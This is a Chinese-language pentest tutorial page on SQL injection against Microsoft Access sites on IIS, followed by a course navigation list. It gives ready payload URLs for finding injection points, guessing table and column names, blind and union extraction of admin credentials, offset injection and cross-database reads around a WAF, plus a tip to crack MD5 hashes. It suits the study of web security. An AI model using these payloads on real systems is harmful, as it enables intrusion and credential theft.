[toc]
Access數據庫windows平臺下的小型數據庫,搭建方便,維護簡單,因此一般是與windowns下的iis中間件一起用的
## 找注入點并確定數據庫類型
找注入點
```SQL
'? ? ? ? ● 返回錯誤
and 1=1? ??●返回正常
and 1=2? ??● 返回錯誤
# 滿足以上條件即存在注入
```
判斷iis后的數據庫類型
```sql
and exists (select * from msysobjects)>0 ●返回正常,即可判斷其為Access數據庫
and exists (select * from sysobjects)>0 ●返回正常,即可判斷其為MSSQL數據庫
```
## 猜數據庫名和字段
access數據庫沒有有效辦法獲取庫表名,只能通過暴力破解的方式一個一個的嘗試
**猜解數據庫表名**
access數據庫沒有庫名的概念,直接就是表
```SQL
and exists(select * from 表名)
# 一個一個猜,猜中為止,例如:
http://XXX?id=1 and exists(select * from users)
http://XXX?id=1 and exists(select * from admin)
http://XXX?id=1 and exists(select * from administrator)
```
**猜字段:**
```sql
and exists(select 字段名 from 表名)
# 一個一個猜,猜中為止 例如:
http://XXX?id=1 and exists(select username from administrator)
http://XXX?id=1 and exists(select user_name from administrator)
http://XXX?id=1 and exists(select password from administrator)
```
## 爆破access中的數據
### 猜字段長度和數據(標準)
**猜解字段長度**
通過上述步驟可以知道,數據庫表名是“administrator”,表中字段有“user_name”和“password”。
```sql
#用返回的對錯猜測
and (select top 1 len(user_name) from administrator)>xx
#如以下報錯,可確定字段數目為5
http://xxx?id=14 and (select top 1 len(user_name) from administrator)>3 ●正常
http://xxx?id=14 and (select top 1 len(user_name) from administrator)>4 ●正常
http://xxx?id=14 and (select top 1 len(user_name) from administrator)>5 ●報錯
```
**猜解字段內容**
```sql
and (select top 1 asc(mid(user_name,1,1)) from administrator)>xx
#先判斷第一個字母,是漢字還是字母
## 返回正常頁面說明ASCII值大于0 ,是字母
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>0
# 二分法確定acsii碼,
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>100
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>50
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)>75
# 最后根據確定下來的acsii碼97,反查對應表得到第一個字母為a,在用同樣的方法確定出來其他位字母
## 密碼的話一般會做md5加密,記得用網站的解密工具嘗試(簡單的可以反解成功)
```
>小提示: access數據庫都是存放在網站目錄下,后綴格式為mdb,asp,asa,可以通過一些暴庫手段、目錄猜解等直接下載數據庫,如果是MSSQL、MYSQL等,一般數據庫是存儲在數據庫安裝路徑下,后綴格式為myi,myd,frm,mdf 不能通過下載得到庫。除非走狗屎運,對方管理員把網站庫備份在網站目錄下。
### 用聯合查詢方案注入(通用)
首先還是要先猜解出所需的表的表名和字段名,這個沒有辦法
再用order by語句排序,根據排序數量,可知當前頁面可查詢字段數,假設為7
再通過union查詢數字,確定出頁面可顯示的字段(假設是第2和3字段)
最后通過union語句聯合查詢指定表(在可顯示的字段替換為需要查詢的表中的字段)
```sql
order by 7
and 1=2 union select 1,2,3,4,5,6,7 from admin
and 1=2 union select 1,user_name,passwoed,4,5,6,7 from admin
```
## 偏移注入和跨庫查詢
### 偏移注入
偏移注入會隨機爆出一個字段內容,具體是什么看運氣
偏移注入只針對Access數據庫,當我們只猜到數據庫表名但猜不到列名的情況下,這種方法可以幫我們填補。
```url
#第一步:使用之前的方法得到顯示點為2,3,字段個數為7,但是我們并不知道列名
http://XXX?id=14 union select 1,2,3,4,5,6,7 from administrator
#第二步:用*依次向前替換數字字段,直到頁面顯示正常。例如在5替換為*后頁面返回正常
http://XXX?id=14union select 1,2,3,4,* from administrator
#說明星號替換了3個字段(也就是表中有三個字段),后續要使用inner jion自表連接查詢,因此計算字段數乘以2是否小于當前列(3*2<7)
#第三步:公式成立的話,用inner jion自連接查詢
http://XXX?id=14 union select 1,* from (administrator as a inner join administrator as b on a.id=b.id)
#如果是更多位,可再接inner join
http://XXX?id=14 union select 1,* from ((administrator as a inner join administrator as b on a.id=b.id) inner join administrator as c a.id=c.id)
```
### 跨庫查詢
假設a和b兩個站點在同一服務器上面,但a服務器上面安裝了安全狗、Waf這樣的安全軟件,現在我們要對a站點進行攻擊,但是沒發現什么大漏洞,只找到網站數據庫路徑,對數據庫下載發現下載不了。
這個時候我發現b站點有注入點。并且知道了“2和3”是注入點,可以通過跨庫的方式,讀取指定目錄下access數據庫的數據。
```url
http://xxx?id=14 union select 1,adminpassword,username,4,5,6,7 from[C:\wwwtest\2AspCMS\AspCms_data\data.asp].Aspcms_Admins
```
- src導航站
- kali和msf
- 信息收集
- 收集域名信息
- Whois 查詢
- 備案信息查詢
- 信用信息查詢
- IP反查站點的站
- 瀏覽器插件
- 收集子域名信息
- 在線平臺
- 工具枚舉
- ssl與證書透明度
- DNS歷史解析
- DNS域傳送漏洞
- C段探測
- JS文件域名&ip探測
- 搜索引擎&情報社區
- google黑客
- 威脅情報
- 鐘馗之眼
- 收集相關應用信息
- 微信公眾號&微博
- APP收集&反編譯
- 收集常用端口信息
- 常見端口&解析&總結
- 掃描工具
- 網絡空間引擎搜索
- 瀏覽器插件
- nmap掃描
- 收集敏感信息
- 源碼泄露
- 郵箱信息收集
- 備份文件泄露
- 目錄&后臺掃描
- 公網網盤
- 歷史資產
- 指紋&WAF&CDN識別
- 指紋識別
- CDN識別
- 繞過CDN查找真實IP
- WAF識別
- 漏洞資源和社工
- 漏洞公共資源庫
- 社會工程
- 資產梳理
- 各種對滲透有幫助的平臺
- 掃描器
- 掃描器對比
- AppScan(IBM)_web和系統
- AWVS_web掃描
- X-Scan_系統掃描
- WebInspect_HP_WEB
- Netsparker_web
- WVSS_綠盟_web
- 安恒明鑒
- Nessus_系統
- nexpose_系統
- 啟明天鏡_web_系統
- SQL注入
- 常用函數
- sql注入步驟
- union注入和information_schema庫
- 函數和報錯注入
- SQL盲注
- 其他注入方式
- 防止SQL注入解決方案
- Access數據庫注入
- MSSQL數據庫注入
- MYSQL數據庫注入
- 神器SQLmap
- xss跨站腳本攻擊
- xss原理和分類
- xss案例和修復
- xss繞過技巧
- xss案例
- 文件上傳下載包含
- 常有用文件路徑
- 文件上傳漏洞
- 文件下載漏洞
- 文件包含漏洞
- upload-labs上傳漏洞練習
- XXE、SSRF、CSRF
- SSRF原理基礎
- SSRF案例實戰
- CSRF原理基礎
- CSRF案例及防范
- XXE之XML_DTD基礎
- XXE之payload與修復
- XXE結合SSRF
- 遠程命令執行與反序列化
- 遠程命令和代碼執行漏洞
- 反序列化漏洞
- 驗證碼與暴力破解
- 爆破與驗證碼原理
- CS架構暴力破解
- BS架構暴力破解
- WEB編輯器漏洞
- 編輯器漏洞基礎
- Ewebeditor編輯器
- FCKeditor編輯器
- 其他編輯器
- web中間件漏洞
- 中間件解析漏洞
- Tomcat常見的漏洞總結
- Jboss漏洞利用總結
- Weblogic漏洞利用總結
- WEB具體步驟
- 旁注和越權
- CDN繞過
- 越權與邏輯漏洞
- WEB應用常見其他漏洞
- WEB登陸頁面滲透思路
- 獲取WEBshell思路
- 社工、釣魚、apt
- 社工和信息收集
- 域名欺騙
- 釣魚郵件
- 一些釣魚用的掛馬工具
- 代碼審計
- 代碼審計工具
- WAF繞過
- WAF基礎及云WAF
- 各種WAF繞過方法
- 繞過WAF上傳文件
- 系統提權
- windows系統提權
- linux系統提權
- 數據庫提權操作系統
- 內網橫向滲透
- 內網穿透方式
- 一些內網第三方應用提權
- ARP與DOS
- ARP欺騙
- DOS與DDOS
- 一些DOS工具